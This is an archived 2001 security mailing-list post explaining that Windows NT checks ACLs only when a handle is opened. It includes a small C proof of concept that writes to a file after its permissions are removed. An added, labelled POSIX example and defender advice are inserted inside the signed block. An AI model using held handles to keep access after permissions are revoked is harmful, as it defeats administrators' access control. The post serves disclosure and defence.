Windows NT does not check permissions after HANDLEs are open

From: c0nceptat_private
Date: Wed Aug 29 2001 - 16:00:26 PDT

    -----BEGIN PGP SIGNED MESSAGE-----
    
    
       Sorry for the cross-post; I thought this would be relevant to both communities.
    
       The component of the NT executive responsible for enforcing ACLs and DACLs is known as the Security Reference Monitor (SRM). When a kernel resource is requested, the requesting program specifies the type of access it desires. The SRM checks the request against the object's access list and grants the requestor a HANDLE to the object if the requestor has the appropriate rights.
        The check against the ACL occurs only when the HANDLE is first opened, however. If a HANDLE is opened and the permissions on the object subsequently change, the original requestor retains the access it was originally granted. Therefore, it is possible to retain access to an object after the Creator/Owner or an administrator has changed the ACL, simply by keeping the handle open. If the requestor is a service or server program that is expected to run 24/7, the object will remain accessible long after the ACL has been altered [think ISAPI, extended stored procedures, et al.].
    
    
      -- c0ncept
    
      O/T: I own a Honda, and have been told by every mechanic that has looked at it that it is the easiest car to break into [the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.
    
    proof of concept:
      1.) Create a file named "test.txt". Make it writeable to the current user.
      2.) Compile and run the included C code.
      3.) When the program prompts you to change the ACL, uncheck
          "Allow Inheritable Permissions to Propagate" and remove all
          entries (ACEs) from the ACL. Press <return> at the prompt.
      4.) Take ownership of the file and open it. Notice that although the
          ACL had already been modified, the write succeeded.
    
    [-- cut code here --]
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    
    #define FILE_NAME	"test.txt"
    #define MESSAGE		"Test"
    #define MSG_LEN		4		/* strlen(MESSAGE) */
    
    int main(int argc, char** argv)
    {
    	HANDLE fileHandle;
    	DWORD written;
    
    	/* The access check against the file's DACL happens here, once,
    	   when the handle is opened with GENERIC_WRITE. */
    	fileHandle = CreateFile(FILE_NAME, GENERIC_WRITE,
    		FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
    		OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    	if(fileHandle == INVALID_HANDLE_VALUE){
    		/* perror() does not report Win32 errors; use GetLastError() */
    		fprintf(stderr, "CreateFile failed, error %lu\n", GetLastError());
    		exit(1);
    	}
    	/* While we block here, change the ACL on test.txt to deny access. */
    	printf("Change the file's ACLs and press enter.");
    	fflush(stdout);
    	getchar();
    	/* No re-check against the new ACL: the handle keeps its granted access. */
    	if(!WriteFile(fileHandle, MESSAGE, MSG_LEN, &written, NULL))
    		fprintf(stderr, "WriteFile failed, error %lu\n", GetLastError());
    	else
    		printf("Wrote %lu bytes after the ACL change.\n", written);
    	CloseHandle(fileHandle);
    
    	return 0;
    }
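    The behaviour the poster demonstrates for NT handles is the same open-time
    access check that POSIX systems apply to file descriptors: open(2) consults
    the permission bits once, and a descriptor that is already open keeps its
    access mode after chmod(2). The program below is an added example, not part
    of the original post; it creates its own temporary file under /tmp
    (constructed input), revokes every permission bit, and shows that a write
    through the retained descriptor still succeeds while a fresh open is denied.
    The helper names (write_through_retained_fd, fresh_open_denied) are this
    example's own. Note that root bypasses mode bits, so fresh_open_denied()
    only reports EACCES for a non-root caller.

```c
/* Added example (not the original poster's code): the same open-time
 * access check on POSIX. Permission bits are consulted by open(2);
 * a descriptor that is already open keeps its access mode after chmod(2).
 * Constructed input: a temporary file created under /tmp by mkstemp(3). */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a temp file, open it for writing, revoke all permission bits,
 * then write through the still-open descriptor.
 * Returns 1 if the write succeeded despite the new mode, 0 otherwise. */
int write_through_retained_fd(void)
{
    char path[] = "/tmp/handle_demo_XXXXXX";
    int fd = mkstemp(path);                 /* created 0600, opened O_RDWR */
    if (fd < 0)
        return 0;
    /* The "ACL change": nobody may read or write the file from now on. */
    if (chmod(path, 0) != 0) {
        close(fd);
        unlink(path);
        return 0;
    }
    const char msg[] = "Test";
    /* Still passes: access was granted at open() and is not re-checked. */
    ssize_t n = write(fd, msg, sizeof msg - 1);
    close(fd);
    unlink(path);
    return n == (ssize_t)(sizeof msg - 1);
}

/* Same setup, but attempt a fresh open() after chmod(path, 0).
 * Returns 1 if the new open is refused with EACCES. For root this returns 0,
 * because root is exempt from mode-bit checks; callers should test geteuid(). */
int fresh_open_denied(void)
{
    char path[] = "/tmp/handle_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return 0;
    if (chmod(path, 0) != 0) {
        close(fd);
        unlink(path);
        return 0;
    }
    int fd2 = open(path, O_WRONLY);         /* new access check: now denied */
    int denied = (fd2 < 0 && errno == EACCES);
    if (fd2 >= 0)
        close(fd2);
    close(fd);
    unlink(path);
    return denied;
}

int main(void)
{
    printf("write via retained fd after chmod 0: %s\n",
           write_through_retained_fd() ? "succeeded" : "failed");
    printf("fresh open after chmod 0: %s\n",
           fresh_open_denied() ? "denied (EACCES)" : "allowed");
    return 0;
}
```

    The defender's consequence is the same on both platforms: tightening an ACL
    or mode does not revoke access already granted to running code. To make a
    permission change effective, the processes holding handles must close them
    or be restarted, and on Windows a tool that enumerates open handles (such
    as Sysinternals handle.exe) is the way to confirm nothing still holds the
    object open.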
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.0
    
    wlwEARECABwFAjuNdeQVHGMwbmNlcHRAaHVzaG1haWwuY29tAAoJEPQWHaIUc7jETigA
    n3E8BIlimuBni27rFfMuDV5FslDTAKCWoLPNCVWbYkFZOqoQB0JfHHfRWw==
    =gsEn
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 22:08:20 PDT